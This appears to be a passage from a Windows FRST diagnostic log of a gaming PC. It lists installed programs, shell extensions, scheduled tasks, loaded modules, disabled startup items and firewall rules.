Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TAP-Windows 9.21.2 (HKLM\...\TAP-Windows) (Version: 9.21.2 - )
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.1.4 - TeamSpeak Systems GmbH)
TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.83369 - TeamViewer)
TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version:  - TechPowerUp)
The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios)
The Klub 17 (HKU\S-1-5-21-2661263523-112610016-3866790350-1000\...\Klub-7) (Version: 7.5.0 - Team WRK17)
Tom Clancy's Rainbow Six Siege (HKLM-x32\...\Uplay Install 635) (Version:  - Ubisoft Montreal)
Tunngle (HKLM-x32\...\Tunngle_is1) (Version: 5.8.7 - Tunngle.net GmbH)
Uplay (HKLM-x32\...\Uplay) (Version: 26.0 - Ubisoft)
VirusTotal Uploader 2.2 (HKLM-x32\...\VTUploader) (Version:  - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.6 - VideoLAN)
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
Warhammer End Times Vermintide [v.1.4.3] (HKLM-x32\...\{WETV-6B52-2B42-48D3-6FDF3A861253}_is1) (Version: 1.4.3 - )
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
Xperia Companion (HKLM-x32\...\{62FC2304-E50B-4476-8AB0-8DE598A57076}) (Version: 1.5.3.0 - Sony) Hidden
Xperia Companion (HKLM-x32\...\{8d53ad63-24f0-4f9e-bb4f-53c7d69a67d6}) (Version: 1.5.3.0 - Sony)
Xperia Companion Service (HKLM\...\{1BF08694-7353-47AD-B618-6A619DC2DD2F}) (Version: 1.5.3.0 - Sony) Hidden
Yet Another (remote) Process Monitor 2.4.2 (HKLM-x32\...\{EFD64A45-12DC-4429-853F-10B453B90F0A}_is1) (Version: 2.4.2 - v_k softwares)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2661263523-112610016-3866790350-1000_Classes\CLSID\{41052F6E-3662-4584-BCD3-77BCCAAE8470}\InprocServer32 -> C:\Users\Sblck\AppData\Local\SkypePlugin\7.32.6.278\GatewayActiveX-x64.dll (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-2661263523-112610016-3866790350-1000_Classes\CLSID\{60813F68-E9F7-4B3C-80B4-A76A66211660}\localserver32 -> C:\Users\Sblck\AppData\Local\SkypePlugin\7.32.6.278\GatewayVersion-x64.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-2661263523-112610016-3866790350-1000_Classes\CLSID\{CBF9CD8C-2714-4F36-B76A-43E6C7547BC2}\localserver32 -> C:\Users\Sblck\AppData\Local\SkypePlugin\7.32.6.278\EdgeCalling.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-2661263523-112610016-3866790350-1000_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2017-04-29] (Igor Pavlov)
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2016-09-21] ()
ContextMenuHandlers1: [ESET Smart Security - Context Menu Shell Extension] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET NOD32 Antivirus\shellExt.dll [2016-12-14] (ESET)
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ContextMenuHandlers1: [QuickSFV Shell Extension] -> {906b0e6e-61ce-11d3-8ee2-0060080a7242} => C:\Program Files\QuickSFV\QSFVShll.dll [2017-09-25] (Mercedes)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers2: [ESET Smart Security - Context Menu Shell Extension] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET NOD32 Antivirus\shellExt.dll [2016-12-14] (ESET)
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes)
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2017-04-29] (Igor Pavlov)
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ContextMenuHandlers4: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} =>  -> No File
ContextMenuHandlers4: [QuickSFV Shell Extension] -> {906b0e6e-61ce-11d3-8ee2-0060080a7242} => C:\Program Files\QuickSFV\QSFVShll.dll [2017-09-25] (Mercedes)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2017-12-05] (NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2017-04-29] (Igor Pavlov)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ContextMenuHandlers6: [ESET Smart Security - Context Menu Shell Extension] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET NOD32 Antivirus\shellExt.dll [2016-12-14] (ESET)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes)
ContextMenuHandlers6: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} =>  -> No File
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0540CF0D-03F8-49C8-A1B9-7D52B023F7AE} - System32\Tasks\GyazoUpdateTaskMachine => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2017-12-21] (Nota Inc.)
Task: {21D4E20E-BAD2-49D2-BD66-8CBC9CAD71E3} - System32\Tasks\MSIAfterburner => C:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe [2017-10-31] ()
Task: {4744DA1F-57CD-4A22-9415-F59CAE8CCF75} - System32\Tasks\Core Temp Autostart Sblck => D:\Programs\Core Temp\Core Temp.exe [2016-09-11] ()
Task: {50669B1B-11BA-4FF4-AE07-496DD9C8D39D} - System32\Tasks\Opera scheduled Autoupdate 1500706514 => C:\Program Files\Opera\launcher.exe [2017-12-18] (Opera Software)
Task: {50B2C331-4933-4083-BBC6-6F4135519816} - System32\Tasks\HPCustParticipation HP Deskjet 3520 series => C:\Program Files\HP\HP Deskjet 3520 series\Bin\HPCustPartic.exe [2012-10-17] (Hewlett-Packard Co.)
Task: {510ED6C8-2CC3-47C9-A69C-DFF6D6BB0CD1} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2017-06-06] ()
Task: {A5E12DDB-1FC8-4654-BB03-8AE61E4715BF} - System32\Tasks\{4F5304D5-3859-490D-8CFF-18EC617A72A0} => "c:\program files (x86)\google\chrome\application\chrome.exe" hxxps://ui.skype.com/ui/0/7.40.0.103/pp/abandoninstall?source=lightinstaller&page=tsMain
Task: {A6C93A3A-F882-4D17-9096-0E181298585A} - System32\Tasks\GyazoUpdateTaskMachineDaily => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2017-12-21] (Nota Inc.)
Task: {AA0C1BC0-162D-4253-BC5C-D2F60B21DF56} - System32\Tasks\SpeedFan\SpeedFan => F:\Program Files (x86)\SpeedFan\speedfan.exe [2016-06-29] ()
Task: {ACEDE6E7-03B8-4979-9357-F08EE54B3FA5} - System32\Tasks\ScpUpdater => C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe [2016-04-12] (Nefarius Software Solutions)
Task: {D3ABF47C-5762-4538-BAF2-55C4DDE525E4} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-27] (Google Inc.)
Task: {E0309C29-204E-4D05-A320-02144963A5DC} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-09-27] (Adobe Systems Incorporated)
Task: {F6176BD5-1805-4689-B510-FBDD6E1E8E07} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-27] (Google Inc.)
Task: {FDE43C44-0B6D-451D-88EE-A0A0D4184D90} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\SamsungMagician.exe [2016-11-23] (Samsung Electronics Co. Ltd.)
Task: {FEE7FAF7-F07E-47D7-A894-7A6E773D72FE} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_26_0_0_131_pepper.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\ScpUpdater.job => C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


==================== Loaded Modules (Whitelisted) ==============

2017-07-19 19:55 - 2017-07-19 19:55 - 000665088 _____ () C:\Program Files\EqualizerAPO\EqualizerAPO.dll
2015-11-22 20:05 - 2015-11-22 20:05 - 001530880 _____ () C:\Program Files\EqualizerAPO\libsndfile-1.dll
2017-07-08 10:52 - 2017-07-08 10:52 - 002983917 _____ () C:\Program Files\EqualizerAPO\libfftw3f-3.dll
2017-09-25 15:19 - 2017-09-25 15:19 - 000307712 _____ () C:\Windows\assembly\NativeImages_v4.0.30319_64\ReactiveSockets\a99a336b4eb0ae7e8899446dd105e2f0\ReactiveSockets.ni.dll
2014-05-02 11:52 - 2014-05-02 11:52 - 000599040 _____ () C:\Program Files\Nefarius Software Solutions\ScpToolkit\irrKlang\amd64\irrKlang.NET4.dll
2014-05-02 06:55 - 2014-05-02 06:55 - 000185344 _____ () C:\Program Files\Nefarius Software Solutions\ScpToolkit\irrKlang\amd64\ikpflac.dll
2014-05-02 06:05 - 2014-05-02 06:05 - 000173056 _____ () C:\Program Files\Nefarius Software Solutions\ScpToolkit\irrKlang\amd64\ikpmp3.dll
2017-09-13 13:01 - 2017-09-22 22:32 - 000076152 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2017-06-28 16:26 - 2017-10-31 06:07 - 000444008 _____ () C:\Program Files (x86)\RivaTuner Statistics Server\RTSSHooks64.dll
2017-09-26 02:52 - 2017-09-26 02:52 - 000491600 _____ () C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll
2016-09-21 20:16 - 2016-09-21 20:16 - 000230064 _____ () C:\Program Files (x86)\Notepad++\NppShell_06.dll
2017-10-31 09:05 - 2017-10-31 09:05 - 000722216 _____ () C:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe
2016-09-28 12:53 - 2016-09-11 09:19 - 000925160 _____ () D:\Programs\Core Temp\Core Temp.exe
2016-01-29 20:27 - 2016-06-07 16:44 - 005781576 _____ () F:\WinAuth-3.5.1\WinAuth.exe
2017-08-19 01:08 - 2017-11-23 19:14 - 001766376 _____ () F:\Games\SteamLibrary\steamapps\common\wallpaper_engine\wallpaper64.exe
2017-10-31 06:07 - 2017-10-31 06:07 - 000252008 _____ () C:\Program Files (x86)\RivaTuner Statistics Server\RTSS.exe
2017-10-31 06:07 - 2017-10-31 06:07 - 000035432 _____ () C:\Program Files (x86)\RivaTuner Statistics Server\EncoderServer.exe
2017-10-31 06:07 - 2017-10-31 06:07 - 000061032 _____ () C:\Program Files (x86)\RivaTuner Statistics Server\RTSSHooksLoader64.exe
2016-06-29 18:01 - 2016-06-29 18:01 - 008166536 _____ () F:\Program Files (x86)\SpeedFan\speedfan.exe
2017-10-29 20:01 - 2017-10-29 20:01 - 000071680 _____ () C:\Program Files (x86)\MSI Afterburner\RTMUI.dll
2017-10-29 20:00 - 2017-10-29 20:00 - 000056832 _____ () C:\Program Files (x86)\MSI Afterburner\RTFC.dll
2017-10-29 20:01 - 2017-10-29 20:01 - 000232448 _____ () C:\Program Files (x86)\MSI Afterburner\RTCore.dll
2017-10-29 20:01 - 2017-10-29 20:01 - 000357888 _____ () C:\Program Files (x86)\MSI Afterburner\RTUI.dll
2017-10-29 20:01 - 2017-10-29 20:01 - 000565760 _____ () C:\Program Files (x86)\MSI Afterburner\RTHAL.dll
2017-06-28 16:26 - 2017-10-31 06:07 - 000410728 _____ () C:\Program Files (x86)\RivaTuner Statistics Server\RTSSHooks.dll
2017-10-10 18:51 - 2017-10-10 18:51 - 000055808 _____ () C:\Program Files (x86)\RivaTuner Statistics Server\RTFC.dll
2017-10-10 18:52 - 2017-10-10 18:52 - 000353792 _____ () C:\Program Files (x86)\RivaTuner Statistics Server\RTUI.dll
2017-10-10 18:52 - 2017-10-10 18:52 - 000071680 _____ () C:\Program Files (x86)\RivaTuner Statistics Server\RTMUI.dll
2017-12-28 15:21 - 2017-12-28 15:33 - 000158720 _____ () C:\Users\Sblck\AppData\Local\Temp\sfareca00001.dll
2017-08-31 14:57 - 2017-12-28 15:33 - 000192512 _____ () C:\Users\Sblck\AppData\Local\Temp\sfamcc00001.dll
2017-09-25 11:59 - 2017-09-25 11:59 - 000172544 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\d2fc11422bda66dae440cd5ca4a89143\IsdiInterop.ni.dll
2016-09-27 17:58 - 2011-04-29 23:28 - 000059904 _____ () C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:DocumentSummaryInformation [63]
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:SummaryInformation [63]
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\S-1-5-21-2661263523-112610016-3866790350-1000\...\phoenix-interactive.net -> phoenix-interactive.net
IE restricted site: HKU\S-1-5-21-2661263523-112610016-3866790350-1000\...\tunngle.biz -> tunngle.biz

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 02:34 - 2017-04-23 01:25 - 000000834 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2661263523-112610016-3866790350-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeUpdateService => 2
MSCONFIG\Services: AGSService => 2
MSCONFIG\Services: BEService => 3
MSCONFIG\Services: BstHdLogRotatorSvc => 3
MSCONFIG\Services: CG6Service => 3
MSCONFIG\Services: Disc Soft Lite Bus Service => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: HiPatchService => 2
MSCONFIG\Services: Origin Client Service => 3
MSCONFIG\Services: Origin Web Helper Service => 2
MSCONFIG\Services: PAExec => 3
MSCONFIG\Services: rpcapd => 3
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: TeamViewer => 3
MSCONFIG\Services: TunngleService => 3
MSCONFIG\Services: XperiaCompanionService => 2
MSCONFIG\startupfolder: C:^Users^Sblck^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Equalizer APO Voicemeeter Client.lnk => C:\Windows\pss\Equalizer APO Voicemeeter Client.lnk.Startup
MSCONFIG\startupreg: Adobe Creative Cloud => "C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: CCleaner Monitoring => "D:\Programs\Ccleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: DAEMON Tools Lite Automount => "C:\Program Files\DAEMON Tools Lite\DTAgent.exe" -autorun
MSCONFIG\startupreg: dpinst => C:\Users\Sblck\AppData\Roaming\DIFX\dpinst.exe
MSCONFIG\startupreg: HP Deskjet 3520 series (NET) => "C:\Program Files\HP\HP Deskjet 3520 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN389110ZR05SY:NW" -scfn "HP Deskjet 3520 series (NET)" -AutoStart 1
MSCONFIG\startupreg: NUSB3MON => "C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe"
MSCONFIG\startupreg: Ozone Neon 3K Driver => "C:\Program Files (x86)\Ozone Neon 3K Driver\OzoneMonitor.exe"
MSCONFIG\startupreg: PC Remote Server => C:\Program Files (x86)\PC Remote\PC Remote\PCRemote.exe /silent
MSCONFIG\startupreg: RESTART_STICKY_NOTES => C:\Windows\System32\StikyNot.exe
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: XperiaCompanionAgent => "C:\Program Files (x86)\Sony\Xperia Companion\XperiaCompanionAgent.exe"
MSCONFIG\startupreg: {31AC3B64-AB6C-4659-BB1A-EEDFBA9B98F7} => "D:\Downloads\LeagueofLegends_EUW_Installer_2016_05_13.exe" /cmdloc "HKCU\Software\Riot Games AiTemp\{31AC3B64-AB6C-4659-BB1A-EEDFBA9B98F7}"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{A68EB209-C1D9-4E70-A12B-49D83309ECA9}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{740E5CAB-6C9F-4A61-9471-AF1E79B5775E}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{7B0F32E0-AFB8-4E65-B115-DFB97A2F6977}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{81064ED7-49CC-4A04-B657-FBB3EF3AFCFE}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{1C9A64F2-43BD-4E3A-8C0E-916FDDB8E1A1}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{7556FDDC-FCB2-4AD2-8C3D-303E8F81418E}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{1F15EEBD-B867-4D10-96BC-22C66FB45C1A}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{A3C0AD4E-80D0-4E5B-8E79-0A4ACCEE7A2D}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{B5814217-718E-4E53-A90C-CA0E3418EE8C}] => (Allow) LPort=27015
FirewallRules: [{F42F6481-7002-4B98-925C-5CAEC4CC8344}] => (Allow) LPort=27015
FirewallRules: [{C89C8666-90F0-47C7-A63A-E195512CC6ED}] => (Allow) LPort=7777
FirewallRules: [{A8506F51-9C08-449A-BC54-AA1F44F4A3A3}] => (Allow) LPort=7777
FirewallRules: [{15ACD813-5390-45CA-8A24-9F14F55631BC}] => (Allow) C:\Program Files\HP\HP Deskjet 3520 series\Bin\DeviceSetup.exe
FirewallRules: [{796342EF-0A9E-49F0-B704-38E5019CAF05}] => (Allow) C:\Program Files\HP\HP Deskjet 3520 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [{D0C67DBF-17EB-4961-A0DD-8D245E56E6B3}] => (Allow) C:\Program Files\HP\HP Deskjet 3520 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{FC48877D-B0D2-4999-A759-518EE4DA6DB9}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{0536FA6C-F5D7-4518-9627-EE71C318D991}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [TCP Query User{A84BE181-1A74-405C-95D7-D15E270D4E2C}D:\programs\ark server\stff\steamcmd\steamcmd.exe] => (Allow) D:\programs\ark server\stff\steamcmd\steamcmd.exe
FirewallRules: [UDP Query User{C6028DD5-E14A-412A-8944-1C8B2C883722}D:\programs\ark server\stff\steamcmd\steamcmd.exe] => (Allow) D:\programs\ark server\stff\steamcmd\steamcmd.exe
FirewallRules: [TCP Query User{4BFF079C-A16D-4DD7-AC35-F84545783478}C:\program files\nefarius software solutions\scptoolkit\scpserver.exe] => (Allow) C:\program files\nefarius software solutions\scptoolkit\scpserver.exe
FirewallRules: [UDP Query User{F8BB4E75-E20F-4350-8F84-44DA2D14F62C}C:\program files\nefarius software solutions\scptoolkit\scpserver.exe] => (Allow) C:\program files\nefarius software solutions\scptoolkit\scpserver.exe
FirewallRules: [{00D5DB0F-048A-423B-AD71-721F0EA34B51}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Sid Meier's Civilization V\CivilizationV.exe
FirewallRules: [{3C508B30-4EE2-4DFF-BF9F-2EBEA8F81480}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Sid Meier's Civilization V\CivilizationV_DX11.exe
FirewallRules: [{BE35A0D2-2501-4AA3-9F37-18D68DF3F46D}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Sid Meier's Civilization V\CivilizationV.exe
FirewallRules: [{B32938FB-2C2D-4411-A204-3F23BC730FF3}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Sid Meier's Civilization V\CivilizationV_DX11.exe
FirewallRules: [{6817A8C0-C21C-4DD9-9160-84015225ABD3}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Team Fortress 2\hl2.exe
FirewallRules: [{76EA049D-2EE2-4CC3-A028-9F51342A4F6B}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Team Fortress 2\hl2.exe
FirewallRules: [{F4E092E0-C5B7-4B11-BC27-532243321735}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe
FirewallRules: [{CD0E1722-5E75-45ED-B6C1-AAB572D6B8C9}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe
FirewallRules: [{0BFAF90B-CFFA-4B16-BE1C-6F0F0811CC89}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe
FirewallRules: [{38CBA3B1-1085-4868-B28F-FAC87FF91E5B}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe
FirewallRules: [{3575AA30-9ABB-4E10-B8ED-44ADA29D7CD4}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{F6DCFE2F-4A6B-4675-B845-E143DD71F359}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{C48C7FD3-6C41-41CB-92FD-B9C363B02EE6}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Borderlands\Binaries\Borderlands.exe
FirewallRules: [{E152B5F7-C0C2-4639-A72D-BA168D1F2CDD}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Borderlands\Binaries\Borderlands.exe
FirewallRules: [{8B111CC5-BEE0-44F8-AA51-3A5831768E10}] => (Allow) F:\games\steamlibrary\steamapps\common\sid meier's civilization v\civilizationv_dx11.exe
FirewallRules: [{9D3C7A74-7BEE-43D1-AD51-71D3F97982D9}] => (Allow) F:\games\steamlibrary\steamapps\common\sid meier's civilization v\civilizationv_dx11.exe
FirewallRules: [TCP Query User{DEBEC0ED-8088-495E-96AA-0313D4B27229}F:\games\steamlibrary\steamapps\common\sid meier's civilization v\civilizationv_dx11.exe] => (Allow) F:\games\steamlibrary\steamapps\common\sid meier's civilization v\civilizationv_dx11.exe
FirewallRules: [UDP Query User{15C2DA05-2E8B-4663-8F33-8ED77B804CFE}F:\games\steamlibrary\steamapps\common\sid meier's civilization v\civilizationv_dx11.exe] => (Allow) F:\games\steamlibrary\steamapps\common\sid meier's civilization v\civilizationv_dx11.exe
FirewallRules: [{55617A45-E5CE-4E88-8FFE-435E94FEEA56}] => (Allow) C:\Program Files (x86)\Sony\Xperia Companion\XperiaCompanion.exe
FirewallRules: [{FB61E68A-B9ED-454D-A44A-E97D0CC7ABB4}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe
